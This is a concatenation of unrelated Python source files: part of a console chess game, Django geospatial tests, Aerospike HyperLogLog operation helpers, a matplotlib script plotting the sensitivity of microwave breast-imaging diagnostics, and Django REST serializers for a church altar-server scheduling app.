self.gameboard[((7-i),7)] = placers[i](BLACK,uniDict[BLACK][placers[i]])
placers.reverse()
def main(self):
while True:
self.printBoard()
print(self.message)
self.message = ""
startpos,endpos = self.parseInput()
try:
target = self.gameboard[startpos]
except:
self.message = "could not find piece; index probably out of range"
target = None
if target:
print("found "+str(target))
if target.Color != self.playersturn:
self.message = "you aren't allowed to move that piece this turn"
continue
if target.isValid(startpos,endpos,target.Color,self.gameboard):
self.message = "that is a valid move"
self.gameboard[endpos] = self.gameboard[startpos]
del self.gameboard[startpos]
self.isCheck()
if self.playersturn == BLACK:
self.playersturn = WHITE
else : self.playersturn = BLACK
else :
self.message = "invalid move" + str(target.availableMoves(startpos[0],startpos[1],self.gameboard))
print(target.availableMoves(startpos[0],startpos[1],self.gameboard))
else : self.message = "there is no piece in that space"
def isCheck(self):
#ascertain where the kings are, check all pieces of opposing color against those kings, then if either get hit, check if its checkmate
king = King
kingDict = {}
pieceDict = {BLACK : [], WHITE : []}
for position,piece in self.gameboard.items():
if type(piece) == King:
kingDict[piece.Color] = position
print(piece)
pieceDict[piece.Color].append((piece,position))
#white
if self.canSeeKing(kingDict[WHITE],pieceDict[BLACK]):
self.message = "White player is in check"
if self.canSeeKing(kingDict[BLACK],pieceDict[WHITE]):
self.message = "Black player is in check"
def canSeeKing(self,kingpos,piecelist):
#checks if any pieces in piece list (which is an array of (piece,position) tuples) can see the king in kingpos
for piece,position in piecelist:
if piece.isValid(position,kingpos,piece.Color,self.gameboard):
return True
def parseInput(self):
try:
a,b = input().split()
a = ((ord(a[0])-97), int(a[1])-1)
b = (ord(b[0])-97, int(b[1])-1)
print(a,b)
return (a,b)
except:
print("error decoding input. please try again")
return((-1,-1),(-1,-1))
"""def validateInput(self, *kargs):
for arg in kargs:
if type(arg[0]) is not type(1) or type(arg[1]) is not type(1):
return False
return True"""
def printBoard(self):
print(" 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |")
for i in range(0,8):
print("-"*32)
print(chr(i+97),end="|")
for j in range(0,8):
item = self.gameboard.get((i,j)," ")
print(str(item)+' |', end = " ")
print()
print("-"*32)
"""game class. contains the following members and methods:
two arrays of pieces for each player
8x8 piece array with references to these pieces
a parse function, which turns the input from the user into a list of two tuples denoting start and end points
a checkmateExists function which checks if either players are in checkmate
a checkExists function which checks if either players are in check (woah, I just got that nonsequitur)
a main loop, which takes input, runs it through the parser, asks the piece if the move is valid, and moves the piece if it is. if the move conflicts with another piece, that piece is removed. ischeck(mate) is run, and if there is a checkmate, the game prints a message as to who wins
"""
class Piece:
def __init__(self,color,name):
self.name = name
self.position = None
self.Color = color
def isValid(self,startpos,endpos,Color,gameboard):
if endpos in self.availableMoves(startpos[0],startpos[1],gameboard, Color = Color):
return True
return False
def __repr__(self):
return self.name
def __str__(self):
return self.name
def availableMoves(self,x,y,gameboard):
print("ERROR: no movement for base class")
def AdNauseum(self,x,y,gameboard, Color, intervals):
"""repeats the given interval until another piece is run into.
if that piece is not of the same color, that square is added and
then the list is returned"""
answers = []
for xint,yint in intervals:
xtemp,ytemp = x+xint,y+yint
while self.isInBounds(xtemp,ytemp):
#print(str((xtemp,ytemp))+"is in bounds")
target = gameboard.get((xtemp,ytemp),None)
if target is None: answers.append((xtemp,ytemp))
elif target.Color != Color:
answers.append((xtemp,ytemp))
break
else:
break
xtemp,ytemp = xtemp + xint,ytemp + yint
return answers
def isInBounds(self,x,y):
"checks if a position is on the board"
if x >= 0 and x < 8 and y >= 0 and y < 8:
return True
return False
def noConflict(self,gameboard,initialColor,x,y):
"checks if a single position poses no conflict to the rules of chess"
if self.isInBounds(x,y) and (((x,y) not in gameboard) or gameboard[(x,y)].Color != initialColor) : return True
return False
chessCardinals = [(1,0),(0,1),(-1,0),(0,-1)]
chessDiagonals = [(1,1),(-1,1),(1,-1),(-1,-1)]
def knightList(x,y,int1,int2):
"""sepcifically for the rook, permutes the values needed around a position for noConflict tests"""
return [(x+int1,y+int2),(x-int1,y+int2),(x+int1,y-int2),(x-int1,y-int2),(x+int2,y+int1),(x-int2,y+int1),(x+int2,y-int1),(x-int2,y-int1)]
def kingList(x,y):
return [(x+1,y),(x+1,y+1),(x+1,y-1),(x,y+1),(x,y-1),(x-1,y),(x-1,y+1),(x-1,y-1)]
class Knight(Piece):
def availableMoves(self,x,y,gameboard, Color = None):
if Color is None : Color = self.Color
return [(xx,yy) for xx,yy in knightList(x,y,2,1) if self.noConflict(gameboard, Color, xx, yy)]
class Rook(Piece):
def availableMoves(self,x,y,gameboard ,Color = None):
if Color is None : Color = self.Color
return self.AdNauseum(x, y, gameboard, Color, chessCardinals)
class Bishop(Piece):
def availableMoves(self,x,y,gameboard, Color = None):
if Color is None : Color = self.Color
return self.AdNauseum(x, y, gameboard, Color, chessDiagonals)
class Queen(Piece):
def availableMoves(self,x,y,gameboard, Color = None):
if Color is None : Color = self.Color
return self.AdNauseum(x, y, gameboard, Color, chessCardinals+chessDiagonals)
class King(Piece):
def availableMoves(self,x,y,gameboard, Color = None):
if Color is None : Color = self.Color
return [(xx,yy) for xx,yy in kingList(x,y) if self.noConflict(gameboard, Color, xx, yy)]
class Pawn(Piece):
def __init__(self,color,name,direction):
self.name = name
self.Color = color
#of course, the smallest piece is the hardest to code. direction should be either 1 or -1, should be -1 if the pawn is traveling "backwards"
self.direction = direction
def availableMoves(self,x,y,gameboard, Color = None):
if Color is None : Color = self.Color
answers = []
if (x+1,y+self.direction) in gameboard and self.noConflict(gameboard, Color, x+1, y+self.direction) : answers.append((x+1,y+self.direction))
if (x-1,y+self.direction) in gameboard and self.noConflict(gameboard, Color, x-1, y+self.direction) : answers.append((x-1,y+self.direction))
if (x,y+self.direction) not in gameboard and Color == self.Color : answers.append((x,y+self.direction))# the condition after the and is to make sure the non-capturing movement (the only fucking one in the game) is not used in the calculation of checkmate
return answers
uniDict = {WHITE : {Pawn : "♙", Rook : "♖", Knight : "♘", Bishop : "♗", King : "♔", Queen : "♕" }, BLACK : {Pawn : "♟", Rook : "♜", Knight : "♞", Bishop : "♝", King : "♚", Queen : "♛" }}
Game()
|
StarcoderdataPython
|
3249420
|
<reponame>EpicEric/base_stations_django
from collections import Counter
from django.test import TestCase
from django.contrib.gis.geos import Point
from model_mommy import mommy
from base_station.models import IdentifiedBaseStation
class IdentifiedBaseStationTestCase(TestCase):
def test_one_bs_inside_bounds(self):
bs = mommy.make(IdentifiedBaseStation, point=Point(-46.5, -23.5))
bs_within_box = IdentifiedBaseStation.get_base_stations_inside_bounds(
-46, -23, -47, -24)
self.assertEqual(bs_within_box.first(), bs)
def test_some_bs_inside_and_some_outside_bounds(self):
bs_inside = [
mommy.make(IdentifiedBaseStation, point=Point(-46.5, -23.5)),
mommy.make(IdentifiedBaseStation, point=Point(-46.2, -24.0)),
mommy.make(IdentifiedBaseStation, point=Point(-46.0, -23.9))]
bs_outside = [
mommy.make(IdentifiedBaseStation, point=Point(-47.5, -23.5)),
mommy.make(IdentifiedBaseStation, point=Point(46.2, -24.0)),
mommy.make(IdentifiedBaseStation, point=Point(-46.3, -24.1))]
bs_within_box = IdentifiedBaseStation.get_base_stations_inside_bounds(
-46, -23, -47, -24)
self.assertEqual(Counter(bs_within_box), Counter(bs_inside))
def test_get_covered_area(self):
#TODO
pass
|
StarcoderdataPython
|
4892531
|
<filename>aerospike_helpers/operations/hll_operations.py
'''
Helper functions to create HyperLogLog operation dictionary arguments for
the :mod:`aerospike.Client.operate` and :mod:`aerospike.Client.operate_ordered` methods of the aerospike client.
HyperLogLog bins and operations allow for your application to form fast, reasonable approximations
of members in the union or intersection between multiple HyperLogLog bins.
HyperLogLog’s estimates are a balance between complete accuracy and efficient savings
in space and speed in dealing with extremely large datasets.
.. note:: HyperLogLog operations require server version >= 4.9.0
.. seealso:: `HyperLogLog (Data Type) more info. <https://www.aerospike.com/docs/guide/hyperloglog.html>`_.
Example::
from __future__ import print_function
import sys
import aerospike
from aerospike import exception as ex
from aerospike_helpers.operations import hll_operations as hll_ops
from aerospike_helpers.operations import operations
TEST_NS = "test"
TEST_SET = "demo"
NUM_INDEX_BITS = 12
NUM_MH_BITS = 24
# Configure the client.
config = {"hosts": [("127.0.0.1", 3000)]}
# Create a client and connect it to the cluster.
try:
client = aerospike.client(config).connect()
except ex.ClientError as e:
print("Error: {0} [{1}]".format(e.msg, e.code))
sys.exit(1)
# Add HLL bins.
customers = ["Amy", "Farnsworth", "Scruffy"]
customer_record_keys = [
(TEST_NS, TEST_SET, "Amy"),
(TEST_NS, TEST_SET, "Farnsworth"),
(TEST_NS, TEST_SET, "Scruffy"),
]
items_viewed = [
("item%s" % str(i) for i in range(0, 500)),
("item%s" % str(i) for i in range(0, 750)),
("item%s" % str(i) for i in range(250, 1000)),
]
for customer, key, items in zip(customers, customer_record_keys, items_viewed):
ops = [
operations.write("name", customer),
hll_ops.hll_add("viewed", list(items), NUM_INDEX_BITS, NUM_MH_BITS),
]
try:
client.operate(key, ops)
except ex.ClientError as e:
print("Error: {0} [{1}]".format(e.msg, e.code))
sys.exit(1)
# Find out how many items viewed Amy, Farnsworth, and Scruffy have in common.
Farnsworth_viewed = client.get(customer_record_keys[1])[2]["viewed"]
Scruffy_viewed = client.get(customer_record_keys[2])[2]["viewed"]
viewed = [Farnsworth_viewed, Scruffy_viewed]
ops = [hll_ops.hll_get_intersect_count("viewed", viewed)]
try:
_, _, res = client.operate(customer_record_keys[0], ops)
except ex.ClientError as e:
print("Error: {0} [{1}]".format(e.msg, e.code))
sys.exit(1)
print(
"Estimated items viewed intersection: %d."
% res["viewed"]
)
print("Actual intersection: 250.\\n")
# Find out how many unique products Amy, Farnsworth, and Scruffy have viewed.
Farnsworth_viewed = client.get(customer_record_keys[1])[2]["viewed"]
Scruffy_viewed = client.get(customer_record_keys[2])[2]["viewed"]
viewed = [Farnsworth_viewed, Scruffy_viewed]
ops = [hll_ops.hll_get_union_count("viewed", viewed)]
try:
_, _, res = client.operate(customer_record_keys[0], ops)
except ex.ClientError as e:
print("Error: {0} [{1}]".format(e.msg, e.code))
sys.exit(1)
print(
"Estimated items viewed union: %d."
% res["viewed"]
)
print("Actual union: 1000.\\n")
# Find the similarity of Amy, Farnsworth, and Scruffy's product views.
Farnsworth_viewed = client.get(customer_record_keys[1])[2]["viewed"]
Scruffy_viewed = client.get(customer_record_keys[2])[2]["viewed"]
viewed = [Farnsworth_viewed, Scruffy_viewed]
ops = [hll_ops.hll_get_similarity("viewed", viewed)]
try:
_, _, res = client.operate(customer_record_keys[0], ops)
except ex.ClientError as e:
print("Error: {0} [{1}]".format(e.msg, e.code))
sys.exit(1)
print(
"Estimated items viewed similarity: %f%%."
% (res["viewed"] * 100)
)
print("Actual similarity: 25%.")
"""
Expected output:
Estimated items viewed intersection: 235.
Actual intersection: 250.
Estimated items viewed union: 922.
Actual union: 1000.
Estimated items viewed similarity: 25.488069%.
Actual similarity: 25%.
"""
'''
import aerospike
OP_KEY = "op"
BIN_KEY = "bin"
HLL_POLICY_KEY = "hll_policy"
INDEX_BIT_COUNT_KEY = "index_bit_count"
MH_BIT_COUNT_KEY = "mh_bit_count"
VALUE_LIST_KEY = "value_list"
def hll_add(bin_name, values, index_bit_count=None, mh_bit_count=None, policy=None):
"""Creates a hll_add operation to be used with operate, or operate_ordered.
Server will add the values to the hll bin.
If the HLL bin does not exist, it will be created with index_bit_count and/or mh_bit_count if they have been supplied.
Args:
bin_name (str): The name of the bin to be operated on.
values: The values to be added to the HLL set.
        index_bit_count: An optional number of index bits. Must be between 4 and 16 inclusive.
        mh_bit_count: An optional number of min hash bits. Must be between 4 and 58 inclusive.
policy (dict): An optional dictionary of :ref:`hll policy options <aerospike_hll_policies>`.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_ADD,
BIN_KEY: bin_name,
VALUE_LIST_KEY: values,
INDEX_BIT_COUNT_KEY: -1 if index_bit_count is None else index_bit_count,
MH_BIT_COUNT_KEY: -1 if mh_bit_count is None else mh_bit_count
}
if policy:
op_dict[HLL_POLICY_KEY] = policy
return op_dict
def hll_describe(bin_name):
"""Creates a hll_describe operation to be used with operate, or operate_ordered.
Server returns index and minhash bit counts used to create HLL bin in a list of integers.
The list size is 2.
Args:
bin_name (str): The name of the bin to be operated on.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_DESCRIBE,
BIN_KEY: bin_name,
}
return op_dict
def hll_fold(bin_name, index_bit_count):
"""Creates a hll_fold operation to be used with operate, or operate_ordered.
    Server folds index_bit_count down to the specified value.
This can only be applied when minhash bit count on the HLL bin is 0.
Server does not return a value.
Args:
bin_name (str): The name of the bin to be operated on.
        index_bit_count: number of index bits. Must be between 4 and 16 inclusive.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_FOLD,
BIN_KEY: bin_name,
INDEX_BIT_COUNT_KEY: index_bit_count
}
return op_dict
def hll_get_count(bin_name):
"""Creates a hll_get_count operation to be used with operate, or operate_ordered.
Server returns estimated count of elements in the HLL bin.
Args:
bin_name (str): The name of the bin to be operated on.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_GET_COUNT,
BIN_KEY: bin_name,
}
return op_dict
def hll_get_intersect_count(bin_name, hll_list):
"""Creates a hll_get_intersect_count operation to be used with operate, or operate_ordered.
Server returns estimate of elements that would be contained by the intersection of these HLL objects.
Args:
bin_name (str): The name of the bin to be operated on.
hll_list (list): The HLLs to be intersected.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_GET_INTERSECT_COUNT,
BIN_KEY: bin_name,
VALUE_LIST_KEY: hll_list
}
return op_dict
def hll_get_similarity(bin_name, hll_list):
"""Creates a hll_get_similarity operation to be used with operate, or operate_ordered.
Server returns estimated similarity of the HLL objects.
Server returns a float.
Args:
bin_name (str): The name of the bin to be operated on.
hll_list (list): The HLLs used for similarity estimation.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_GET_SIMILARITY,
BIN_KEY: bin_name,
VALUE_LIST_KEY: hll_list
}
return op_dict
def hll_get_union(bin_name, hll_list):
"""Creates a hll_get_union operation to be used with operate, or operate_ordered.
Server returns an HLL object that is the union of all specified HLL objects
in hll_list with the HLL bin.
Args:
bin_name (str): The name of the bin to be operated on.
hll_list (list): The HLLs to be unioned.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_GET_UNION,
BIN_KEY: bin_name,
VALUE_LIST_KEY: hll_list
}
return op_dict
def hll_get_union_count(bin_name, hll_list):
"""Creates a hll_get_union_count operation to be used with operate, or operate_ordered.
Server returns the estimated count of elements that would be contained by the union of all specified HLL objects
in the list with the HLL bin.
Args:
bin_name (str): The name of the bin to be operated on.
hll_list (list): The HLLs to be unioned.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_GET_UNION_COUNT,
BIN_KEY: bin_name,
VALUE_LIST_KEY: hll_list
}
return op_dict
def hll_init(bin_name, index_bit_count=None, mh_bit_count=None, policy=None):
"""Creates a hll_init operation to be used with operate, or operate_ordered.
Server creates a new HLL or resets an existing HLL.
If index_bit_count and mh_bit_count are None, an existing HLL bin will be reset but retain its configuration.
    If only one of index_bit_count or mh_bit_count is set,
    an existing HLL bin will apply that config and retain its current value for the unset config.
If the HLL bin does not exist, index_bit_count is required to create it, mh_bit_count is optional.
Server does not return a value.
Args:
bin_name (str): The name of the bin to be operated on.
        index_bit_count: An optional number of index bits. Must be between 4 and 16 inclusive.
        mh_bit_count: An optional number of min hash bits. Must be between 4 and 58 inclusive.
policy (dict): An optional dictionary of :ref:`hll policy options <aerospike_hll_policies>`.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_INIT,
BIN_KEY: bin_name,
INDEX_BIT_COUNT_KEY: -1 if index_bit_count is None else index_bit_count,
MH_BIT_COUNT_KEY: -1 if mh_bit_count is None else mh_bit_count
}
if policy:
op_dict[HLL_POLICY_KEY] = policy
return op_dict
def hll_refresh_count(bin_name):
"""Creates a hll_refresh_count operation to be used with operate, or operate_ordered.
Server updates the cached count if it is stale.
Server returns the count.
Args:
bin_name (str): The name of the bin to be operated on.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_REFRESH_COUNT,
BIN_KEY: bin_name,
}
return op_dict
def hll_set_union(bin_name, hll_list, policy=None):
"""Creates a hll_set_union operation to be used with operate, or operate_ordered.
Server sets the union of all specified HLL objects with the HLL bin.
Server returns nothing.
Args:
bin_name (str): The name of the bin to be operated on.
        hll_list (list): The HLLs whose union will be set.
policy (dict): An optional dictionary of :ref:`hll policy options <aerospike_hll_policies>`.
"""
op_dict = {
OP_KEY: aerospike.OP_HLL_SET_UNION,
BIN_KEY: bin_name,
VALUE_LIST_KEY: hll_list
}
if policy:
op_dict[HLL_POLICY_KEY] = policy
return op_dict
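# Hedged usage sketch (not part of the original module): the helpers above only
# build operation dictionaries; they take effect through
# aerospike.Client.operate(). The bin name, record key and value list below are
# hypothetical.
def _example_estimate_unique_viewers(client, key):
    """Return the estimated cardinality of a hypothetical 'viewers' HLL bin.

    Assumes ``client`` is a connected aerospike.Client and ``key`` is a
    (namespace, set, primary-key) tuple.
    """
    ops = [
        hll_init("viewers", index_bit_count=12),
        hll_add("viewers", ["viewer-%d" % i for i in range(100)]),
        hll_get_count("viewers"),
    ]
    _, _, bins = client.operate(key, ops)
    return bins["viewers"]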
|
StarcoderdataPython
|
5142882
|
"""
<NAME>
University of Manitoba
September 10th, 2021
"""
import os
import numpy as np
import matplotlib.pyplot as plt
from umbms import get_proj_path, verify_path
from umbms.loadsave import load_pickle
###############################################################################
__OUT_DIR = os.path.join(get_proj_path(), 'output/g3/diagnostic-figs/')
verify_path(__OUT_DIR)
# Define RGB colors for plotting
das_col = [0, 0, 0]
dmas_col = [80, 80, 80]
orr_col = [160, 160, 160]
das_col = [ii / 255 for ii in das_col]
dmas_col = [ii / 255 for ii in dmas_col]
orr_col = [ii / 255 for ii in orr_col]
###############################################################################
def plt_adi_ref_performance():
"""Plot the diagnostic performance when adipose-only used as ref
"""
# Define x-coords for bars
das_xs = [0, 3.5]
dmas_xs = [1, 4.5]
orr_xs = [2, 5.5]
# Init plot
plt.figure(figsize=(12, 6))
plt.rc('font', family='Times New Roman')
plt.tick_params(labelsize=20)
# Plot DAS sensitivity and specificity
plt.bar(das_xs,
height=[das_sens[0], das_spec],
width=0.75,
linewidth=1,
color=das_col,
edgecolor='k',
label='DAS')
# Plot DMAS sensitivity and specificity
plt.bar(dmas_xs,
height=[dmas_sens[0], dmas_spec],
width=0.75,
capsize=10,
linewidth=1,
color=dmas_col,
edgecolor='k',
label='DMAS')
    # Plot ORR sensitivity and specificity
plt.bar(orr_xs,
height=[orr_sens[0], orr_spec],
width=0.75,
capsize=10,
linewidth=1,
color=orr_col,
edgecolor='k',
label='ORR')
plt.legend(fontsize=18,
loc='upper left',
framealpha=0.95)
plt.xticks([1, 4.5],
["Sensitivity", "Specificity"],
size=20)
plt.ylabel('Metric Value (%)', fontsize=22)
# Put text on the bars
das_text_ys = [15, 40]
das_for_text = [das_sens[0], das_spec]
dmas_text_ys = [16, 36]
dmas_for_text = [dmas_sens[0], dmas_spec]
gd_text_ys = [23, 52]
gd_for_text = [orr_sens[0], orr_spec]
for ii in range(len(das_text_ys)):
plt.text(das_xs[ii], das_text_ys[ii],
"%d" % das_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
for ii in range(len(dmas_text_ys)):
plt.text(dmas_xs[ii], dmas_text_ys[ii],
"%d" % dmas_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
for ii in range(len(gd_text_ys)):
plt.text(orr_xs[ii], gd_text_ys[ii],
"%d" % gd_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
# Set appropriate y-limit
plt.ylim([0, 100])
plt.tight_layout() # Make everything fit nicely
plt.show() # Display the plot
# Save the figure
plt.savefig(os.path.join(__OUT_DIR, 'sens_spec_adi_refs.png'),
dpi=300, transparent=False)
def plt_fib_ref_performance():
"""Plot the diagnostic performance when healthy scan as reference
"""
# Define x-coords for bars
das_xs = [0, 3.5]
dmas_xs = [1, 4.5]
orr_xs = [2, 5.5]
# Init fig
plt.figure(figsize=(12, 6))
plt.rc('font', family='Times New Roman')
plt.tick_params(labelsize=20)
plt.bar(das_xs,
height=[das_sens[1], das_spec],
width=0.75,
linewidth=1,
color=das_col,
edgecolor='k',
label='DAS')
plt.bar(dmas_xs,
height=[dmas_sens[1], dmas_spec],
width=0.75,
capsize=10,
linewidth=1,
color=dmas_col,
edgecolor='k',
label='DMAS')
plt.bar(orr_xs,
height=[orr_sens[1], orr_spec],
width=0.75,
capsize=10,
linewidth=1,
color=orr_col,
edgecolor='k',
label='ORR')
plt.legend(fontsize=18,
loc='upper left',
framealpha=0.95)
plt.xticks([1, 4.5],
["Sensitivity", "Specificity"],
size=20)
plt.ylabel('Metric Value (%)', fontsize=22)
# Put text on the bars
das_text_ys = [67, 40]
das_for_text = [das_sens[1], das_spec]
dmas_text_ys = [74, 36]
dmas_for_text = [dmas_sens[1], dmas_spec]
gd_text_ys = [78, 52]
gd_for_text = [orr_sens[1], orr_spec]
for ii in range(len(das_text_ys)):
plt.text(das_xs[ii], das_text_ys[ii],
"%d" % das_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
for ii in range(len(dmas_text_ys)):
plt.text(dmas_xs[ii], dmas_text_ys[ii],
"%d" % dmas_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
for ii in range(len(gd_text_ys)):
plt.text(orr_xs[ii], gd_text_ys[ii],
"%d" % gd_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
# Set appropriate y-limit
plt.ylim([0, 100])
plt.tight_layout() # Make everything fit nicely
plt.show() # Display the plot
# Save fig
plt.savefig(os.path.join(__OUT_DIR, 'sens_spec_fib_refs.png'),
dpi=300, transparent=False)
def plt_sens_by_tum_adi():
"""Plot sensitivity as a function of tumour size with adi refs
"""
# Define x-coords of bars
das_xs = [0, 3.5, 7, 10.5, 14]
dmas_xs = [1, 4.5, 8, 11.5, 15]
orr_xs = [2, 5.5, 9, 12.5, 16]
# Init fig
plt.figure(figsize=(12, 6))
plt.rc('font', family='Times New Roman')
plt.tick_params(labelsize=20)
plt.bar(das_xs,
height=das_by_tum_adi,
width=0.75,
linewidth=1,
color=das_col,
edgecolor='k',
label='DAS')
plt.bar(dmas_xs,
height=dmas_by_tum_adi,
width=0.75,
capsize=10,
linewidth=1,
color=dmas_col,
edgecolor='k',
label='DMAS')
plt.bar(orr_xs,
height=orr_by_tum_adi,
width=0.75,
capsize=10,
linewidth=1,
color=orr_col,
edgecolor='k',
label='ORR')
plt.legend(fontsize=18,
loc='upper left',
framealpha=0.95)
plt.xticks(dmas_xs,
["30", "25", "20", "15", "10"],
size=20)
plt.ylabel('Sensitivity (%)', fontsize=22)
plt.xlabel('Tumour Diameter (mm)', fontsize=22)
# Put text on the fig
das_text_ys = np.array(das_by_tum_adi) - 4
das_text_ys[np.array(das_by_tum_adi) == 0] = 4
das_for_text = das_by_tum_adi
dmas_text_ys = np.array(dmas_by_tum_adi) - 4
dmas_text_ys[np.array(dmas_by_tum_adi) == 0] = 4
dmas_for_text = dmas_by_tum_adi
orr_text_ys = np.array(orr_by_tum_adi) - 4
orr_text_ys[np.array(orr_by_tum_adi) == 0] = 4
orr_for_text = orr_by_tum_adi
for ii in range(len(das_text_ys)):
plt.text(das_xs[ii], das_text_ys[ii],
"%d" % das_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
for ii in range(len(dmas_text_ys)):
plt.text(dmas_xs[ii], dmas_text_ys[ii],
"%d" % dmas_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
for ii in range(len(orr_text_ys)):
plt.text(orr_xs[ii], orr_text_ys[ii],
"%d" % orr_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
# Set appropriate y-limit
plt.ylim([0, 100])
plt.tight_layout() # Make everything fit nicely
plt.show() # Display the plot
# Save fig
plt.savefig(os.path.join(__OUT_DIR, 'sens_by_tum_adi.png'),
dpi=300, transparent=False)
def plt_sens_by_tum_fib():
"""Plot sensitivity vs tumour size when healthy scan used as refs
"""
# Define x-coords for bars
das_xs = [0, 3.5, 7, 10.5, 14]
dmas_xs = [1, 4.5, 8, 11.5, 15]
orr_xs = [2, 5.5, 9, 12.5, 16]
# Init fig
plt.figure(figsize=(12, 6))
plt.rc('font', family='Times New Roman')
plt.tick_params(labelsize=20)
# Plot bars
plt.bar(das_xs,
height=das_by_tum_fib,
width=0.75,
linewidth=1,
color=das_col,
edgecolor='k',
label='DAS')
plt.bar(dmas_xs,
height=dmas_by_tum_fib,
width=0.75,
capsize=10,
linewidth=1,
color=dmas_col,
edgecolor='k',
label='DMAS')
plt.bar(orr_xs,
height=orr_by_tum_fib,
width=0.75,
capsize=10,
linewidth=1,
color=orr_col,
edgecolor='k',
label='ORR')
plt.legend(fontsize=18,
loc='upper right',
framealpha=0.95)
plt.xticks(dmas_xs,
["30", "25", "20", "15", "10"],
size=20)
plt.ylabel('Sensitivity (%)', fontsize=22)
plt.xlabel('Tumour Diameter (mm)', fontsize=22)
das_text_ys = np.array(das_by_tum_fib) - 4
das_text_ys[np.array(das_by_tum_fib) == 0] = 4
das_for_text = das_by_tum_fib
dmas_text_ys = np.array(dmas_by_tum_fib) - 4
dmas_text_ys[np.array(dmas_by_tum_fib) == 0] = 4
dmas_text_ys[np.array(dmas_by_tum_fib) == 5] = 5
dmas_for_text = dmas_by_tum_fib
gd_text_ys = np.array(orr_by_tum_fib) - 4
gd_text_ys[np.array(orr_by_tum_fib) == 0] = 4
gd_for_text = orr_by_tum_fib
for ii in range(len(das_text_ys)):
plt.text(das_xs[ii], das_text_ys[ii],
"%d" % das_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
for ii in range(len(dmas_text_ys)):
plt.text(dmas_xs[ii], dmas_text_ys[ii],
"%d" % dmas_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
for ii in range(len(gd_text_ys)):
plt.text(orr_xs[ii], gd_text_ys[ii],
"%d" % gd_for_text[ii],
size=16,
color='k',
horizontalalignment='center',
verticalalignment='center',
bbox={'facecolor': 'w',
'alpha': 0.9})
# Set appropriate y-limit
plt.ylim([0, 100])
plt.tight_layout() # Make everything fit nicely
plt.show() # Display the plot
plt.savefig(os.path.join(__OUT_DIR, 'sens_by_tum_fib.png'),
dpi=300, transparent=False)
###############################################################################
if __name__ == "__main__":
# Load the sensitivities for adipose/adipose-fibroglandular
# reference subtraction
das_adi_sens, dmas_adi_sens, orr_adi_sens = \
(load_pickle(
os.path.join(get_proj_path(), 'output/g3/',
'adi_sensitivities_at_target_threshold.pickle')))
das_fib_sens, dmas_fib_sens, orr_fib_sens = \
load_pickle(
os.path.join(get_proj_path(), 'output/g3/',
'fib_sensitivities_at_target_threshold.pickle'))
# Load the specificities
das_spec, dmas_spec, orr_spec = \
(load_pickle(
os.path.join(get_proj_path(), 'output/g3/',
'adi_specificities_at_target_threshold.pickle')))
# Define tuples for plots
das_sens = das_adi_sens, das_fib_sens
dmas_sens = dmas_adi_sens, dmas_fib_sens
orr_sens = orr_adi_sens, orr_fib_sens
# Load sensitivities as a function of tumour size
das_by_tum_adi, dmas_by_tum_adi, orr_by_tum_adi = \
load_pickle(os.path.join(get_proj_path(), 'output/g3/',
'adi_sens_by_tums.pickle'))
das_by_tum_fib, dmas_by_tum_fib, orr_by_tum_fib = \
load_pickle(os.path.join(get_proj_path(), 'output/g3/',
'fib_sens_by_tums.pickle'))
# Plot diagnostic performance when adipose and
# adipose-fibroglandular scans used as reference
plt_fib_ref_performance()
plt_adi_ref_performance()
# Plot sensitivity as a function of tumour size when adipose
# scans used as references
plt_sens_by_tum_adi()
plt_sens_by_tum_fib()
|
StarcoderdataPython
|
1817318
|
<filename>messdiener/serializers.py
from rest_framework import serializers
from .models import *
class LocationSerializer(serializers.ModelSerializer):
class Meta:
model = Location
fields = ('id', 'locationName')
class RoleSerializer(serializers.ModelSerializer):
class Meta:
model = Role
fields = ('id', 'roleName')
class ClassificationSerializer(serializers.ModelSerializer):
def create(self, validated_data):
group = Group.objects.get(pk=self.context['view'].kwargs['group_pk'])
validated_data['group'] = group
return Classification.objects.create(**validated_data)
class Meta:
model = Classification
fields = ('id', 'ageFrom', 'ageTo')
class GroupSerializer(serializers.ModelSerializer):
classifications = ClassificationSerializer(many=True, read_only=True)
class Meta:
model = Group
fields = ('id', 'groupName', 'classifications')
class RequirementSerializer(serializers.ModelSerializer):
def create(self, validated_data):
type = Type.objects.get(pk=self.context['view'].kwargs['type_pk'])
requirement = Requirement.objects.create(type=type, quantity=validated_data['quantity'],
role=validated_data['role'])
requirement.classifications.set(validated_data['classifications'])
return requirement
class Meta:
model = Requirement
fields = ('id', 'quantity', 'role', 'classifications')
class RuleSerializer(serializers.ModelSerializer):
def create(self, validated_data):
type = Type.objects.get(pk=self.context['view'].kwargs['type_pk'])
validated_data['type'] = type
return Rule.objects.create(**validated_data)
class Meta:
model = Rule
